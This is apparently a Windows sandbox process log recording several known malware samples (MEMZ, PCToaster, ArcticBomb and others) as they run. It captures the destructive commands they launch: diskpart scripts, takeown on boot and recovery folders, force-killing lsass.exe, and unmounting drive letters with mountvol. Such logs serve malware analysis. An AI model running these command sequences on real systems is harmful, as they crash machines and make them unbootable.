"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10744,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --always-read-main-dll --field-trial-handle=10448,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=8888,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10372,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10760 /prefetch:8
C:\Users\Admin\Downloads\Prolin (1).exe
"C:\Users\Admin\Downloads\Prolin (1).exe"
C:\Users\Admin\Downloads\Prolin.exe
"C:\Users\Admin\Downloads\Prolin.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=10276,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10368,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9340 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3316,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10756 /prefetch:8
C:\Users\Admin\Downloads\Quamo.exe
"C:\Users\Admin\Downloads\Quamo.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\eiram\quake4demo.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\eiram\quake4demo.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c f:\quake4demo.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c f:\quake4demo.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --always-read-main-dll --field-trial-handle=5884,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10548,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9180 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9084,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10880 /prefetch:8
C:\Users\Admin\Downloads\Trood.a.exe
"C:\Users\Admin\Downloads\Trood.a.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10764,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5876,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --always-read-main-dll --field-trial-handle=10468,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10660,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10856 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10388,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8684 /prefetch:8
C:\Users\Admin\Downloads\Alerta.exe
"C:\Users\Admin\Downloads\Alerta.exe"
C:\Users\Admin\Downloads\Alerta.exe
"C:\Users\Admin\Downloads\Alerta.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --always-read-main-dll --field-trial-handle=10812,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6556,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=4944 /prefetch:8
C:\Users\Admin\Downloads\ClassicShell.exe
"C:\Users\Admin\Downloads\ClassicShell.exe"
C:\Users\Admin\Downloads\ClassicShell.exe
"C:\Users\Admin\Downloads\ClassicShell.exe"
C:\Users\Admin\Downloads\ClassicShell.exe
"C:\Users\Admin\Downloads\ClassicShell.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --always-read-main-dll --field-trial-handle=6372,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9360,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10340 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10268,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10068 /prefetch:8
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --always-read-main-dll --field-trial-handle=10856,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10740,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9444,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10316 /prefetch:8
C:\Users\Admin\Downloads\ColorBug.exe
"C:\Users\Admin\Downloads\ColorBug.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cb.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --always-read-main-dll --field-trial-handle=10852,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10624,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10160,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10684 /prefetch:8
C:\Users\Admin\Downloads\FlashKiller.exe
"C:\Users\Admin\Downloads\FlashKiller.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7080 -ip 7080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 240
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10360,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --always-read-main-dll --field-trial-handle=10916,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9548,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10936 /prefetch:8
C:\Users\Admin\Downloads\Gas.exe
"C:\Users\Admin\Downloads\Gas.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --always-read-main-dll --field-trial-handle=4316,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10480,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10256 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10384,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10352 /prefetch:8
C:\Users\Admin\Downloads\Illerka.C.exe
"C:\Users\Admin\Downloads\Illerka.C.exe"
C:\Users\Admin\Downloads\Illerka.C.exe
"C:\Users\Admin\Downloads\Illerka.C.exe"
C:\Users\Admin\Downloads\Illerka.C.exe
"C:\Users\Admin\Downloads\Illerka.C.exe"
C:\Users\Admin\Downloads\Illerka.C.exe
"C:\Users\Admin\Downloads\Illerka.C.exe"
C:\Users\Admin\Downloads\Illerka.C.exe
"C:\Users\Admin\Downloads\Illerka.C.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --always-read-main-dll --field-trial-handle=10816,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9156,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --always-read-main-dll --field-trial-handle=10808,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10508,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5192,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4944,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10408 /prefetch:8
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe"
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /watchdog
C:\Users\Admin\Downloads\MEMZ (1).exe
"C:\Users\Admin\Downloads\MEMZ (1).exe" /main
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --always-read-main-dll --field-trial-handle=10988,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10556,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8320 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10056,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=8576 /prefetch:8
C:\Users\Admin\Downloads\PCToaster.exe
"C:\Users\Admin\Downloads\PCToaster.exe"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\PCToaster.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +h C:\Users\Admin\Downloads\scr.txt
C:\Windows\SYSTEM32\diskpart.exe
diskpart /s C:\Users\Admin\Downloads\scr.txt
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Users\Admin\Downloads\PCToaster.exe
"C:\Users\Admin\Downloads\PCToaster.exe"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\PCToaster.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+get+money
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://google.co.ck/search?q=how+to+get+money
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --always-read-main-dll --field-trial-handle=6068,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --always-read-main-dll --field-trial-handle=11024,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9020 /prefetch:1
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Boot /r
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Recovery /r
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --always-read-main-dll --field-trial-handle=10316,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10832,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=9508 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+buy+weed
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://google.co.ck/search?q=how+2+buy+weed
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --always-read-main-dll --field-trial-handle=5584,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --always-read-main-dll --field-trial-handle=2716,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=6604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10576,i,17415772046502199086,7186350744842046410,262144 --variations-seed-version --mojo-platform-channel-handle=10888 /prefetch:8
C:\Windows\SYSTEM32\taskkill.exe
taskkill /im lsass.exe /f
C:\Windows\SYSTEM32\taskkill.exe
taskkill /im lsass.exe /f
C:\Windows\SYSTEM32\mountvol.exe
mountvol A: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol B: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol D: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol E: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol F: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol G: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol H: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol I: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol J: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol K: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol L: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol M: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol N: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol O: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol P: /d
